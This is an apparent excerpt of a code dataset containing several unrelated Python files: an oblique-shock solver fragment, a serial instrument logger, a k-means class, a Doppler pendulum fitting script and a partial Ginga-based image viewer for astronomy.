math.atan(2*(1/math.tan(math.radians(B)))*(M**2*(math.sin(math.radians(B)))**2-1)/(M**2*(g+math.cos(math.radians(2*B)))+2))-math.radians(T)\n \n g = gamma\n M = Mach\n T = Theta\n \n RBeta = []\n \n BM = M_Beta(g,M)\n \n Theta_max = M_Theta(g, M, BM)\n \n Mach_angle = Mach_a(M)\n\n #Strong Root for Beta function\n #This root will be between 90 and the theta max\n #F = the function\n #sA = Theta max\n #sB = 90\n #iteration is set automatically to 100\n\n #setting bounds\n for c in range(1,3):\n if c == 1:\n Old_A = math.degrees(BM) #p0\n Old_B = float(90) #p1\n \n if c == 2:\n Old_A = Mach_angle\n Old_B = math.degrees(BM)\n \n #verifying\n## if f(Old_A)*f(Old_B) >= 0:\n## print(\"failed verification\")\n## return None\n\n #iterating to find the solution for beta\n for n in range(1, 100):\n \n new = Old_B - f(Old_B)*(Old_B - Old_A)/(f(Old_B)-f(Old_A))\n solvenew = f(new)\n \n if abs(new-Old_B) <0.0001:\n sBeta = Old_A - f(Old_A)*(Old_B - Old_A)/(f(Old_B) - f(Old_A))\n \n RBeta.append([sBeta,n])\n break\n\n elif n==99:\n print('failed')\n else:\n Old_A=Old_B\n Old_B=new\n \n return RBeta\n\ndef M_Beta(g,M):\n #print(\"veriables\")\n #print(g)\n #print(M)\n f1 = 1+((g-1)/2)*(M**2)+((g+1)/16)*(M**4)\n f2 = math.sqrt((g+1)*f1)\n f3 = (((g+1)/4)*(M**2)+f2-1)\n f4 = math.sqrt((1/(g*(M**2)))*f3)\n BM = math.asin(f4)\n #print(\"Beta Max\")\n #print(BM)\n return BM\n\n\ndef M_Theta(gamma, Mach, Beta):\n\n #print(\"Varribles\")\n #print(gamma)\n #print(Mach)\n #print(Beta)\n \n g = gamma\n M = Mach\n B = Beta\n \n top = ((M**2)*(math.sin(B)*math.sin(B))-1)*(1/math.tan(B))\n bot = (((1/2)*(g+1)*(M**2))-((M**2)*(math.sin(B)*math.sin(B)))+1)\n \n TM = math.degrees(1/(math.tan(top/bot)))\n\n #print(\"The maximum flow deflection is \")\n #print(TM)\n \n return TM\n\n\ndef Mach_a(Mach):\n \n M = Mach\n \n mu = math.degrees(math.asin(1/M))\n\n #print(mu)\n \n return mu\n\n\n#Main Code area\n\nfunctionMatrix = {\n \"Mach\":mach,\n \"Theta\":theta,\n \"Beta\":beta ,\n}\n\nlst = {\n \"Mach\":[\"gamma\", \"Beta\", \"Theta\"],\n \"Theta\":[\"gamma\", \"Mach\", \"Beta\"],\n \"Beta\":[\"gamma\", \"Mach\", \"theta\"]\n }\n\nver = []\n\nprint(\"Available Functions:\")\nfor function in functionMatrix.keys():\n print(function)\n\nchosen = str(input(\"Which Function Would You Like to run? \"))\nprint(chosen)\n\nvariableList = lst[chosen]\nfor var in variableList:\n ele = float(input(f\"Please input {var}: \"))\n ver.append(ele)\n \nresults = functionMatrix[chosen](*ver)\n\nif isinstance(results, list):\n a,b = results\n a = results[0]\n b = results[1]\n print('potato')\n pass # list returned\nelse:\n pass # 1 value returend\n\n\n\"\"\"\nMn1=M*math.sin(math.radians(Beta))\nMn2=((Mn1**2+(2/(gamma-1)))/((2*gamma/(gamma-1)*Mn1**2)-1))**0.5\nM2=Mn2/(math.sin(math.radians(Beta-Theta)))\nPressure_Ratio=1+(Mn1**2-1)*(2*gamma/(gamma+1))\nDensity_Ratio=((gamma+1)*Mn1**2)/((gamma-1)*Mn1**2+2)\nTemperature_ratio=Pressure_Ratio/Density_Ratio\n\"\"\"\n","sub_path":"MatthewsWorkInProgressCode.py","file_name":"MatthewsWorkInProgressCode.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"8876282","text":"#!/usr/bin/env python\n\n# Load the libraries\nimport serial # Serial communications\nimport time # Timing utilities\nimport subprocess # Shell utilities ... 
compressing data files\n\n# Set the time constants\nrec_time=time.gmtime()\ntimestamp = time.strftime(\"%Y/%m/%d %H:%M:%S GMT\",rec_time)\n# Read the settings from the settings file\nsettings_file = open(\"./settings.txt\")\n# e.g. \"/dev/ttyUSB0\"\nsettings_line = settings_file.readline().rstrip('\\n').split(',')\nport = settings_line[0]\nbaud = eval(settings_line[1])\npar = settings_line[2]\nbyte = eval(settings_line[3])\nceol = settings_line[4]\nif ceol == 'r':\n\teol = b'\\r'\nelif ceol == 'nr':\n\teol = b'\\n\\r'\nelse:\n\teol = b'\\n'\nprint(port)\n# path for data files\n# e.g. \"/home/logger/datacpc3010/\"\ndatapath = settings_file.readline().rstrip('\\n')\nprint(datapath)\nprev_file_name = datapath+time.strftime(\"%Y%m%d.txt\",rec_time)\n# Read the compressing flag\nflags = settings_file.readline().rstrip().split(',')\n# Close the settings file\nsettings_file.close()\n# Hacks to work with custom end of line\nleneol = len(eol)\nprint(leneol)\nbline = bytearray()\n# Open the serial port and clean the I/O buffer\nser = serial.Serial()\nser.port = port\nser.baudrate = baud\nser.parity = par\nser.bytesize = byte\nser.open()\nser.flushInput()\nser.flushOutput()\nwhile True:\n\t# Get a line of data from the instrument\n\twhile True:\n\t\tc = ser.read(1)\n\t\tbline += c\n\t\tif bline[-leneol:] == eol:\n\t\t\tbreak\n\t## Parse the data line\n\tline = bline.decode(\"utf-8\").rstrip()\n\t#line = ser.readline()\n\t# Set the time for the record\n\trec_time_s = int(time.time())\n\trec_time=time.gmtime()\n\ttimestamp = time.strftime(\"%Y/%m/%d %H:%M:%S GMT\",rec_time)\n\tfile_line = timestamp+','+line\n\tprint(file_line)\n\t# Save it to the appropriate file\n\tcurrent_file_name = datapath+time.strftime(\"%Y%m%d.txt\",rec_time)\n\tcurrent_file = open(current_file_name,\"a\")\n\tcurrent_file.write(file_line+\"\\n\")\n\tcurrent_file.flush()\n\tcurrent_file.close()\n\tline = \"\"\n\tbline = bytearray()\n\t# Compress data if required\n\t# Is it the last minute of the day?\n\tif flags[0] == 1:\n\t\tif current_file_name != prev_file_name:\n\t\t\tsubprocess.call([\"gzip\",prev_file_name])\n\t\t\tprev_file_name = current_file_name\t\nprint('I\\'m done')\n","sub_path":"logger_main.py","file_name":"logger_main.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"502534860","text":"import numpy as np\n\n\nclass Cluster:\n def __init__(self, centre):\n self.members_list = list()\n self.centre = centre\n self.mean_point = np.zeros(centre.size)\n\n def append(self, x):\n self.members_list.append(x)\n self.mean_point += (x - self.mean_point) / self.members_list.__len__()\n\n def update_centre(self):\n self.centre = self.mean_point\n\n def clean(self):\n self.members_list = list()\n self.mean_point=np.zeros(self.centre.size)\n\n def sum_squared_error(self):\n error = 0\n for x in self.members_list:\n error += np.linalg.norm(x - self.centre) ** 2\n return error\n\n\nclass kMeans:\n def __init__(self, k_num, data):\n self.cluster_list = [Cluster(i) for i in data[np.random.choice(data.shape[0], k_num, replace=False)]]\n self.error=self.cluster_data(data)\n\n def cluster_data(self, data):\n iterations = 0\n curr_error=0\n prev_error=0\n while iterations < 100:\n iterations += 1\n if iterations % 10 == 0:\n if prev_error > curr_error:\n break\n for x in data:\n closest_cluster = self.calc_closest(x)\n closest_cluster.append(x)\n\n prev_error = curr_error\n curr_error = 0\n for x in self.cluster_list:\n x.update_centre()\n 
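                # accumulate this cluster's sum of squared errors into the
                # epoch total; clean() below then empties the cluster for the
                # next assignment pass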
curr_error += x.sum_squared_error()\n x.clean()\n return curr_error\n\n\n def calc_closest(self, x):\n closest = self.cluster_list[0]\n for mu in self.cluster_list:\n if self.distance_metric(x, mu) < self.distance_metric(x, closest):\n closest = mu\n return closest\n\n def distance_metric(self, x, cluster):\n return np.linalg.norm(x - cluster.centre)\n","sub_path":"kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"462660629","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nfrom scipy.integrate import trapz\r\n\r\ndef func(x, a, omega, phi):\r\n return a * np.sin(omega * x + phi)\r\n\r\n# adatok betoltese\r\ndata = np.loadtxt('meresek\\\\3doppler_inga6ts15.csv', delimiter='\\t', skiprows=1)\r\n\r\n# tengelyek definialasa\r\nTime = data[:,0]\r\nFreq = data[:,1]\r\nSpeed = data[:,2]\r\n\r\n# nan adatok kivetele\r\nfor idx, val in enumerate(Freq):\r\n if np.isnan(val):\r\n Freq[idx] = 1000\r\n Speed[idx] = 0\r\n \r\n# Az elmozdulas numerikus integrálása a sebessegbol trapezszaballyal\r\nPos = np.zeros((Time.size))\r\nfor i, val in enumerate(Speed):\r\n Pos[i] = trapz(Speed[:i]-np.mean(Speed), Time[:i])\r\n \r\n# szogkiteres meghatarozasa az elmozdulasbol ha l = 71 cm\r\nAlpha = Pos / 0.71\r\n\r\n# hibabecsles\r\nFrerror = 1\r\nSperror = (340 * 1000)/(Freq**2) * Frerror\r\nPerror = Sperror\r\nAlpherror = Alpha * np.sqrt( (Perror/Pos)**2 + (1/71)**2 )\r\n\r\n# betutipus beallitasa\r\nplt.rc('text', usetex=True)\r\nplt.rc('font', family='serif')\r\n\r\n# abrazolas, tengelyek elnevezese, cim, stb.\r\nfig, axs = plt.subplots(2, sharex=True)\r\nfig.suptitle('Inga mérése Doppler-effektussal')\r\n\r\nfitlim=600\r\naxs[0].plot(Time, Alpha, '.', color='crimson', label = 'Mért szögkitérés a sebesség numerikus integrálásából')\r\naxs[1].plot(Time, Pos, '.', color='orange', label = 'A lengés irányába vett elmozdulás numerikus integrálásból')\r\n\r\n# hiba abrazolasa es szinuszfuggveny illesztes hibaval\r\naxs[0].errorbar(Time, Alpha, yerr=Alpherror, fmt=' ', color='#FE6F5E')\r\naxs[1].errorbar(Time, Pos, yerr=Perror, fmt=' ', color='yellow')\r\npopt, pcov = curve_fit(func, Time[:fitlim], Speed[:fitlim], sigma = Sperror[:fitlim], p0=[1, 3.14,-3.14], method='lm')\r\n\r\n# szogkiteres, elomzdulas illesztesbol\r\nTheoAlph = -popt[0]/(popt[1]*0.71) * np.cos( popt[1] * Time + popt[2])\r\nTheoPos = -popt[0]/popt[1] * np.cos( popt[1] * Time + popt[2])\r\n\r\n\r\nprint(popt, '\\n',pcov)\r\n\r\n# uj amplitudo hibaja kiteresre\r\nnewamp_err = popt[0]/popt[1] * np.sqrt( (np.sqrt(pcov[0][0])/popt[0])**2 + (np.sqrt(pcov[1][1])/popt[1])**2 )\r\n# szogre\r\nnewamp_err2 = popt[0]/(popt[1] *0.71 ) * np.sqrt( (np.sqrt(pcov[0][0])/popt[0])**2 + (np.sqrt(pcov[1][1])/popt[1])**2 + (1/71)**2 )\r\n\r\n\r\naxs[0].plot(Time[:fitlim], TheoAlph[:fitlim], 'orange',\r\n label = '$\\\\varphi (t) =$ ( ' + str( round(1/popt[0]/(popt[1] *0.71 ), 4) ) + ' $\\pm$ ' + str( round(newamp_err2, 4) ) +' ) $\\cdot \\cos(($'\r\n + str( round(popt[1], 4) ) + ' $\\pm$ ' + str( round(np.sqrt(pcov[1][1]), 4) ) + '$) \\cdot t)$ rad')\r\naxs[1].plot(Time[:fitlim], TheoPos[:fitlim], 'crimson',\r\n label = '$s (t) =$ ( ' + str( round(1/popt[0]/popt[1], 4) ) + ' $\\pm$ ' + str( round(newamp_err, 4) ) +' ) $\\cdot \\cos(($'\r\n + str( round(popt[1], 4) ) + ' $\\pm$ ' + str( round(np.sqrt(pcov[1][1]), 4) ) + '$) \\cdot t)$ m')\r\n\r\nplt.xlabel('$t$ 
(s)')\r\naxs[0].set_ylabel('$\\\\varphi$ (rad)')\r\naxs[1].set_ylabel('$s$ (m)')\r\n\r\nfor ax in axs:\r\n ax.legend(loc='upper left')\r\n ax.grid()\r\n\r\n# grafikon mentese\r\nplt.savefig('doppler_inga2', dpi=300)","sub_path":"doppler_inga2.py","file_name":"doppler_inga2.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"101679252","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"\nThis class supports communication with a Ginga-based viewer.\n\nFor default key and mouse shortcuts in a Ginga window, see:\n https://ginga.readthedocs.org/en/latest/quickref.html\n\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport sys\nimport os\nimport traceback\nimport time\nimport warnings\nimport logging\nimport threading\nimport numpy as np\n\nfrom . import util\nfrom astropy.io import fits\n\nfrom ginga.misc import log, Settings\nfrom ginga.AstroImage import AstroImage\nfrom ginga import cmap\nfrom ginga.util import paths\n#from ginga.qtw.QtHelp import QtGui\n\nimport matplotlib\nfrom matplotlib import pyplot as plt\n# module variables\n_matplotlib_cmaps_added = False\n\n__all__ = ['ginga_mp']\n\n\nclass ginga_general(object):\n\n \"\"\" A class which controls all interactions between the user and the\n ginga window\n\n The ginga_mp() contructor creates a new window with the matplotlib backend\n\n Parameters\n ----------\n close_on_del : boolean, optional\n If True, try to close the window when this instance is deleted.\n\n\n Attributes\n ----------\n view: Ginga view object\n The object instantiated from a Ginga view class\n\n exam: imexamine object\n \"\"\"\n\n def __init__(self, exam=None, close_on_del=True, logger=None):\n \"\"\"\n\n Notes\n -----\n Ginga viewers all need a logger, if none is provided it will create one\n\n\n \"\"\"\n global _matplotlib_cmaps_added\n\n self.exam = exam\n self._close_on_del = close_on_del\n # dictionary where each key is a frame number, and the values are a\n # dictionary of details about the image loaded in that frame\n self._viewer = dict()\n self._current_frame = 1\n self._current_slice = None\n\n self.ginga_view = None # ginga view object\n\n self._define_cmaps() # set up possible color maps\n\n # for synchronizing on keystrokes\n self._cv = threading.RLock()\n self._kv = []\n self._capturing = False\n\n # ginga objects need a logger, create a null one if we are not\n # handed one in the constructor\n if logger is None:\n logger = log.get_logger(null=True)\n self.logger = logger\n self._saved_logger = logger\n self._debug_logger = log.get_logger(level=10, log_stderr=True)\n\n # Establish settings (preferences) for ginga viewers\n basedir = paths.ginga_home\n self.prefs = Settings.Preferences(\n basefolder=basedir,\n logger=self.logger)\n\n # general preferences shared with other ginga viewers\n settings = self.prefs.createCategory('general')\n settings.load(onError='silent')\n settings.setDefaults(useMatplotlibColormaps=False,\n autocuts='on', autocut_method='zscale')\n self.settings = settings\n\n # add matplotlib colormaps to ginga's own set if user has this\n # preference set\n if settings.get('useMatplotlibColormaps', False) and \\\n (not _matplotlib_cmaps_added):\n # Add matplotlib color maps if matplotlib is installed\n try:\n cmap.add_matplotlib_cmaps()\n _matplotlib_cmaps_added = True\n except Exception as e:\n print(\n \"Failed to load matplotlib colormaps: {0}\".format(\n str(e)))\n\n # 
bindings preferences shared with other ginga viewers\n bind_prefs = self.prefs.createCategory('bindings')\n bind_prefs.load(onError='silent')\n\n # viewer preferences unique to imexam ginga viewers\n viewer_prefs = self.prefs.createCategory('imexam')\n viewer_prefs.load(onError='silent')\n\n # create the viewer specific to this backend\n self._create_viewer(bind_prefs, viewer_prefs)\n\n # enable all interactive ginga features\n bindings = self.ginga_view.get_bindings()\n bindings.enable_all(True)\n self.ginga_view.add_callback('key-press', self._key_press_normal)\n\n canvas = self.canvas\n canvas.enable_draw(False)\n canvas.add_callback('key-press', self._key_press_imexam)\n canvas.setSurface(self.ginga_view)\n canvas.ui_setActive(True)\n self.canvas = canvas\n\n def _draw_indicator(self):\n return\n # -- Here be black magic ------\n # This function draws the imexam indicator on the lower left\n # hand corner of the canvas\n\n try:\n # delete previous indicator, if there was one\n self.canvas.deleteObjectByTag('indicator')\n except:\n pass\n\n # assemble drawing classes\n canvas = self.canvas\n Text = canvas.getDrawClass('text')\n Rect = canvas.getDrawClass('rectangle')\n Compound = canvas.getDrawClass('compoundobject')\n\n # calculations for canvas coordinates\n mode = 'imexam'\n xsp, ysp = 6, 6\n wd, ht = self.ginga_view.get_window_size()\n #x1, y1 = wd-12*len(mode), ht-12\n x1, y1 = 12, 12\n o1 = Text(x1, y1, mode,\n fontsize=12, color='orange', coord='canvas')\n #o1.fitsimage = self.view\n wd, ht = o1.get_dimensions()\n\n # yellow text on a black filled rectangle\n o2 = Compound(Rect(x1 - xsp, y1 - ht - ysp, x1 + wd + xsp, y1 + ht + ysp,\n color='black',\n fill=True, fillcolor='black', coord='canvas'),\n o1, coord='canvas')\n\n # use canvas, not data coordinates\n\n canvas.add(o2, tag='indicator')\n # -- end black magic ------\n\n def _create_viewer(self, bind_prefs, viewer_prefs):\n \"\"\"Create backend-specific viewer.\"\"\"\n raise Exception(\"Subclass should override this method!\")\n\n def _capture(self):\n \"\"\"\n Insert our canvas so that we intercept all events before they reach\n processing by the bindings layer of Ginga.\n \"\"\"\n self.ginga_view.onscreen_message(\"Entering imexam mode\",\n delay=1.0)\n # insert the canvas\n self.ginga_view.add(self.canvas, tag='mycanvas')\n self._draw_indicator()\n self._capturing = True\n\n def _release(self):\n \"\"\"\n Remove our canvas so that we no longer intercept events.\n \"\"\"\n self.ginga_view.onscreen_message(\"Leaving imexam mode\",\n delay=1.0)\n self._capturing = False\n self.canvas.deleteObjectByTag('indicator')\n\n # retract the canvas\n self.ginga_view.deleteObjectByTag('mycanvas')\n\n def __str__(self):\n return \"\"\n\n def __del__(self):\n if self._close_on_del:\n self.close()\n\n def _set_frameinfo(self, frame, fname=None, hdu=None, data=None,\n image=None):\n \"\"\"Set the name and extension information for the data displayed in\n frame n and gather header information.\n\n Notes\n -----\n \"\"\"\n\n # check the current frame, if none exists, then don't continue\n if frame:\n if frame not in self._viewer.keys():\n self._viewer[frame] = dict()\n\n if data is None or not data.any():\n try:\n data = self._viewer[frame]['user_array']\n except KeyError:\n pass\n\n extver = None # extension number\n extname = None # name of extension\n filename = None # filename of image\n numaxis = 2 # number of image planes, this is NAXIS\n # tuple of each image plane, defaulted to 1 image plane\n naxis = (0)\n # data has more than 2 
dimensions and loads in cube/slice frame\n iscube = False\n mef_file = False # used to check misleading headers in fits files\n\n if hdu:\n pass\n\n # update the viewer dictionary, if the user changes what's displayed in a frame this should update correctly\n # this dictionary will be referenced in the other parts of the code. This enables tracking user arrays through\n # frame changes\n\n self._viewer[frame] = {'filename': fname,\n 'extver': extver,\n 'extname': extname,\n 'naxis': naxis,\n 'numaxis': numaxis,\n 'iscube': iscube,\n 'user_array': data,\n 'image': image,\n 'hdu': hdu,\n 'mef': mef_file}\n\n def valid_data_in_viewer(self):\n \"\"\"return bool if valid file or array is loaded into the viewer\"\"\"\n frame = self.frame()\n\n if self._viewer[frame]['filename']:\n return True\n else:\n try:\n if self._viewer[frame]['user_array'].any():\n valid = True\n elif self._viewer[frame]['hdu'].any():\n valid = True\n elif self._viewer[frame]['image'].any():\n valid = True\n except AttributeError as ValueError:\n valid = False\n print(\"error in array\")\n\n return valid\n\n def get_filename(self):\n \"\"\"return the filename currently on display\"\"\"\n frame = self.frame()\n if frame:\n return self._viewer[frame]['filename']\n\n def get_frame_info(self):\n \"\"\"return more explicit information about the data displayed in the current frame\"\"\"\n return self._viewer[self.frame()]\n\n def get_viewer_info(self):\n \"\"\"Return a dictionary of information about all frames which are loaded with data\"\"\"\n return self._viewer\n\n def close(self):\n \"\"\" close the window\"\"\"\n plt.close(self.figure)\n\n def readcursor(self):\n \"\"\"returns image coordinate postion and key pressed,\n\n Notes\n -----\n \"\"\"\n # insert canvas to trap keyboard events if not already inserted\n if not self._capturing:\n self._capture()\n\n with self._cv:\n self._kv = ()\n\n # wait for a key press\n # NOTE: the viewer now calls the functions directly from the\n # dispatch table, and only returns on the quit key here\n while True:\n # ugly hack to suppress deprecation by mpl\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n # run event loop, so window can get a keystroke\n self.figure.canvas.start_event_loop(timeout=0.1)\n\n with self._cv:\n # did we get a key event?\n if len(self._kv) > 0:\n (k, x, y) = self._kv\n break\n\n # ginga is returning 0 based indexes\n return x + 1, y + 1, k\n\n def _define_cmaps(self):\n \"\"\"setup the default color maps which are available\"\"\"\n\n # get ginga color maps\n self._cmap_colors = cmap.get_names()\n\n def cmap(self, color=None, load=None, invert=False, save=False,\n filename='colormap.ds9'):\n \"\"\" Set the color map table to something else, using a defined list of options\n\n\n Parameters\n ----------\n color: string\n color must be set to one of the available DS9 color map names\n\n load: string, optional\n set to the filename which is a valid colormap lookup table\n valid contrast values are from 0 to 10, and valid bias values are from 0 to 1\n\n invert: bool, optional\n invert the colormap\n\n save: bool, optional\n save the current colormap as a file\n\n filename: string, optional\n the name of the file to save the colormap to\n\n \"\"\"\n\n if color:\n if color in self._cmap_colors:\n self.ginga_view.set_color_map(color)\n else:\n print(\"Unrecognized color map, choose one of these:\")\n print(self._cmap_colors)\n\n # these should be pretty easy to support if we use matplotlib\n # to load them\n if invert:\n warnings.warn(\"Colormap 
invert not supported\")\n\n if load:\n warnings.warn(\"Colormap loading not supported\")\n\n if save:\n warnings.warn(\"Colormap saving not supported\")\n\n def frame(self, n=None):\n \"\"\"convenience function to change or report frames\n\n\n Parameters\n ----------\n n: int, string, optional\n The frame number to open or change to. If the number specified doesn't exist, a new frame will be opened\n If nothing is specified, then the current frame number will be returned.\n\n Examples\n --------\n frame(1) sets the current frame to 1\n frame(\"last\") set the current frame to the last frame\n frame() returns the number of the current frame\n frame(\"new\") opens a new frame\n frame(3) opens frame 3 if it doesn't exist already, otherwise goes to frame 3\n\n \"\"\"\n frame = self._current_frame\n n_str = str(n)\n frames = sorted(self._viewer.keys())\n\n if not n is None:\n if n_str == \"delete\":\n if frame in frames:\n del self._viewer[frame]\n frames = self._viewer.keys()\n if len(frames) > 0:\n n = frames[0]\n else:\n n = None\n\n elif n_str == \"new\":\n n = frames[-1]\n n += 1\n self._set_frameinfo(n)\n\n elif n_str == \"last\":\n n = frames[-1]\n\n elif n_str == \"first\":\n n = frames[0]\n\n else:\n n = int(n)\n if not n in frames:\n print(\"%d is not a created frame.\" % (n))\n\n self._current_frame = n\n image = self._viewer[frame]['image']\n if image is not None:\n self.ginga_view.set_image(image)\n return n\n\n else:\n return frame\n\n def iscube(self):\n \"\"\"return information on whether a cube image is displayed in the current frame\"\"\"\n frame = self.frame()\n if frame:\n return self._viewer[frame]['iscube']\n\n def get_slice_info(self):\n \"\"\"return the slice tuple that is currently displayed\"\"\"\n frame = self.frame()\n\n if self._viewer[frame]['iscube']:\n image_slice = self._viewer[frame]['naxis']\n else:\n image_slice = None\n return image_slice\n\n def get_data(self):\n \"\"\" return a numpy array of the data displayed in the current frame\n \"\"\"\n\n frame = self.frame()\n if frame:\n if isinstance(self._viewer[frame]['user_array'], np.ndarray):\n return self._viewer[frame]['user_array']\n\n elif self._viewer[frame]['hdu'] != None:\n return self._viewer[frame]['hdu'].data\n\n elif self._viewer[frame]['image'] != None:\n return self._viewer[frame]['image'].get_data()\n\n def get_header(self):\n \"\"\"return the current fits header as a string or None if there's a problem\"\"\"\n\n # TODO return the simple header for arrays which are loaded\n\n frame = self.frame()\n if frame and self._viewer[frame]['hdu'] != None:\n hdu = self._viewer[frame]['hdu']\n return hdu.header\n else:\n warnings.warn(\"No file with header loaded into ginga\")\n return None\n\n def _key_press_normal(self, canvas, keyname):\n \"\"\"\n This callback function is called when a key is pressed in the\n ginga window without the canvas overlaid. It's sole purpose is to\n recognize an 'i' to put us into 'imexam' mode.\n \"\"\"\n if keyname == 'i':\n self._capture()\n return True\n return False\n\n def _key_press_imexam(self, canvas, keyname):\n \"\"\"\n This callback function is called when a key is pressed in the\n ginga window with the canvas overlaid. 
It handles all the\n dispatch of the 'imexam' mode.\n \"\"\"\n data_x, data_y = self.ginga_view.get_last_data_xy()\n self.logger.debug(\"key %s pressed at data %f,%f\" % (\n keyname, data_x, data_y))\n\n if keyname == 'i':\n # temporarily switch to non-imexam mode\n self._release()\n return True\n\n elif keyname == 'backslash':\n # exchange normal logger for the stdout debug logger\n if self.logger != self._debug_logger:\n self.logger = self._debug_logger\n self.ginga_view.onscreen_message(\"Debug logging on\",\n delay=1.0)\n else:\n self.logger = self._saved_logger\n self.ginga_view.onscreen_message(\"Debug logging off\",\n delay=1.0)\n return True\n\n elif keyname == 'q':\n # exit imexam mode\n self._release()\n\n with self._cv:\n # this will be picked up by the caller in readcursor()\n self._kv = (keyname, data_x, data_y)\n return True\n\n # get our data array\n data = self.get_data()\n self.logger.debug(\n \"x,y,data dim: %f %f %i\" %\n (data_x, data_y, data.ndim))\n self.logger.debug(\"exam=%s\" % str(self.exam))\n # call the imexam function directly\n if self.exam is not None:\n try:\n method = self.exam.imexam_option_funcs[keyname][0]\n except KeyError:\n self.logger.debug(\n \"no method defined in the option_funcs dictionary\")\n return False\n\n self.logger.debug(\n \"calling examine function key={0}\".format(keyname))\n try:\n method(data_x, data_y, data)\n except Exception as e:\n self.logger.error(\"Failed examine function: %s\" % (str(e)))\n try:\n # log traceback, if possible\n (type, value, tb) = sys.exc_info()\n tb_str = \"\".join(traceback.format_tb(tb))\n self.logger.error(\"Traceback:\\n%s\" % (tb_str))\n except Exception:\n tb_str = \"Traceback information unavailable.\"\n self.logger.error(tb_str)\n\n return True\n\n def load_fits(self, fname=\"\", extver=1, extname=None):\n \"\"\"convenience function to load fits image to current frame\n\n Parameters\n ----------\n fname: string, optional\n The name of the file to be loaded. 
You can specify the full extension in the name, such as\n filename_flt.fits[sci,1] or filename_flt.fits[1]\n\n extver: int, optional\n The extension to load (EXTVER in the header)\n\n extname: string, optional\n The name (EXTNAME in the header) of the image to load\n\n Notes\n -----\n \"\"\"\n if fname:\n # see if the image is MEF or Simple\n fname = os.path.abspath(fname)\n short = True\n try:\n mef = util.check_filetype(fname)\n if not mef:\n extver = 0\n cstring = util.verify_filename(fname, getshort=short)\n image = AstroImage(logger=self.logger)\n\n with fits.open(cstring) as filedata:\n hdu = filedata[extver]\n image.load_hdu(hdu)\n\n except Exception as e:\n self.logger.error(\"Exception opening file: {0}\".format(e))\n raise IOError(str(e))\n\n frame = self.frame()\n self._set_frameinfo(frame, fname=fname, hdu=hdu, image=image)\n self.ginga_view.set_image(image)\n\n else:\n print(\"No filename provided\")\n\n def panto_image(self, x, y):\n \"\"\"convenience function to change to x,y physical image coordinates\n\n\n Parameters\n ----------\n x: float\n X location in physical coords to pan to\n\n y: float\n Y location in physical coords to pan to\n\n\n \"\"\"\n # ginga deals in 0-based coords\n x, y = x - 1, y - 1\n\n self.ginga_view.set_pan(x, y)\n\n def panto_wcs(self, x, y, system='fk5'):\n \"\"\"pan to wcs location coordinates in image\n\n\n Parameters\n ----------\n\n x: string\n The x location to move to, specified using the given system\n y: string\n The y location to move to\n system: string\n The reference system that x and y were specified in, they should be understood by DS9\n\n \"\"\"\n # this should be replaced by querying our own copy of the wcs\n image = self.ginga_view.get_image()\n a, b = image.radectopix(x, y, coords='data')\n self.ginga_view.set_pan(a, b)\n\n def rotate(self, value=None):\n \"\"\"rotate the current frame (in degrees), the current rotation is printed with no params\n\n Parameters\n ----------\n\n value: float [degrees]\n Rotate the current frame {value} degrees\n If value is None, then the current rotation is printed\n\n \"\"\"\n if value is not None:\n self.ginga_view.rotate(value)\n\n rot_deg = self.ginga_view.get_rotation()\n print(\"Image rotated at {0:f} deg\".format(rot_deg))\n\n def transform(self, flipx=None, flipy=None, flipxy=None):\n \"\"\"transform the frame\n\n Parameters\n ----------\n\n flipx: boolean\n if True flip the X axis, if False don't, if None leave current\n flipy: boolean\n if True flip the Y axis, if False don't, if None leave current\n swapxy: boolean\n if True swap the X and Y axes, if False don't, if None leave current\n \"\"\"\n _flipx, _flipy, _swapxy = self.ginga_view.get_transform()\n\n # preserve current transform if not supplied as a parameter\n if flipx is None:\n flipx = _flipx\n if flipy is None:\n flipy = _flipy\n if swapxy is None:\n swapxy = _swapxy\n\n self.ginga_view.transform(flipx, flipy, swapxy)\n\n def save_png(self, filename=None):\n \"\"\"save a frame display as a PNG file\n\n Parameters\n ----------\n\n filename: string\n The name of the output PNG image\n\n \"\"\"\n if not filename:\n print(\"No filename specified, try again\")\n else:\n buf = self.ginga_view.get_png_image_as_buffer()\n with open(filename, 'w') as out_f:\n out_f.write(buf)\n\n def scale(self, scale='zscale'):\n \"\"\" The default zscale is the most widely used option\n\n Parameters\n ----------\n\n scale: string\n The scale for ds9 to use, these are set strings of\n [linear|log|pow|sqrt|squared|asinh|sinh|histequ]\n\n \"\"\"\n\n # 
setting the autocut method?\n mode_scale = self.ginga_view.get_autocut_methods()\n\n if scale in mode_scale:\n self.ginga_view.set_autocut_params(scale)\n return\n\n # setting the color distribution algorithm?\n color_dist = self.ginga_view.get_color_algorithms()\n\n if scale in color_dist:\n self.ginga_view.set_color_algorithm(scale)\n return\n\n def view(self, img):\n \"\"\" Display numpy image array to current frame\n\n Parameters\n ----------\n img: numpy array\n The array containing data, it will be forced to numpy.array()\n\n Examples\n --------\n view(np.random.rand(100,100))\n\n \"\"\"\n\n frame = self.frame()\n if not frame:\n print(\"No valid frame\")\n else:\n img_np = np.array(img)\n image = AstroImage(img_np, logger=self.logger)\n self._set_frameinfo(frame, data=img_np, image=image)\n self.ginga_view.set_image(image)\n\n def zoomtofit(self):\n \"\"\"convenience function for zoom\"\"\"\n self.ginga_view.zoom_fit()\n\n def zoom(self, zoomlevel):\n \"\"\" zoom using the specified level\n\n Parameters\n ----------\n zoomlevel: integer\n\n Examples\n --------\n zoom(6)\n zoom(-3)\n\n \"\"\"\n\n try:\n self.ginga_view.zoom_to(zoomlevel)\n\n except Exception as e:\n print(\"problem with zoom: %s\" % str(e))\n\n\nclass ginga_mp(ginga_general):\n\n \"\"\"\n A ginga-based viewer that uses a matplotlib widget.\n\n This kind of viewer has slower performance than if 